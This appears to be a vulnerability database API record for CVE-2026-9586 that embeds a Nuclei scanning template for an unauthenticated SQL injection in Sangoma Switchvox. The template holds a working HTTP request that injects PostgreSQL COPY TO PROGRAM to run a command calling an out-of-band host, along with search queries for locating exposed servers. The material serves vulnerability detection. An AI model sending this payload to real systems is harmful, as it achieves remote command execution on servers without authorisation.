{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2026-9586/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2026-9586/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2026-9586/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2026-9586/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2026-9586/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2026-9586"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2026-9586"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2026/CVE-2026-9586.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2026-9586\n\ninfo:\n  name: Sangoma Switchvox < 8.4.0.2 - Unauthenticated SQL Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Sangoma Switchvox before version 8.4.0.2 contains an unauthenticated SQL injection vulnerability in the /pa endpoint (PhoneAppsHandler.pm). The PhoneIP field extracted from an XML POST body is concatenated directly into an unparameterized PostgreSQL query that runs as a database superuser. An attacker can break out of the single-quoted SQL string context and leverage PostgreSQL COPY TO PROGRAM to execute arbitrary operating system commands without authentication.\n  impact: |\n    An unauthenticated remote attacker can achieve full remote code execution on the Switchvox server by injecting SQL via the PhoneIP XML field, leveraging PostgreSQL superuser privileges to execute arbitrary OS commands via COPY TO PROGRAM.\n  remediation: |\n    Upgrade Sangoma Switchvox to version 8.4.0.2 or later which parameterizes the SQL query and validates the PhoneIP input.\n  reference:\n    - https://horizon3.ai/attack-research/disclosures/cve-2026-9586-sangoma-switchvox-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-9586\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-9586\n    epss-score: 0.11845\n    epss-percentile: 0.95902\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.html:\"switchvox\"\n    fofa-query: body=\"switchvox\"\n    vendor: sangoma\n    product: switchvox\n  tags: cve,cve2026,sangoma,switchvox,sqli,rce,oast,vkev,vuln,kev\n\nhttp:\n  - raw:\n      - |\n        POST /pa HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml\n\n        <request><PhoneIP>10.0.0.1'; COPY (SELECT '') TO PROGRAM 'nslookup {{interactsh-url}}'--</PhoneIP><command>tel_notify</command></request>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: word\n        part: body\n        words:\n          - \"<html><body></body></html>\"\n# digest: 4a0a00473045022039bf204c55acc2c83c89bc4fba3824c761cf34783679c25c49bab72bec33fc4a022100cca576c9e003dd7136616cdc99599ef331b9412d2a99af3ff5909e267dff5b67:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2026-9586"
}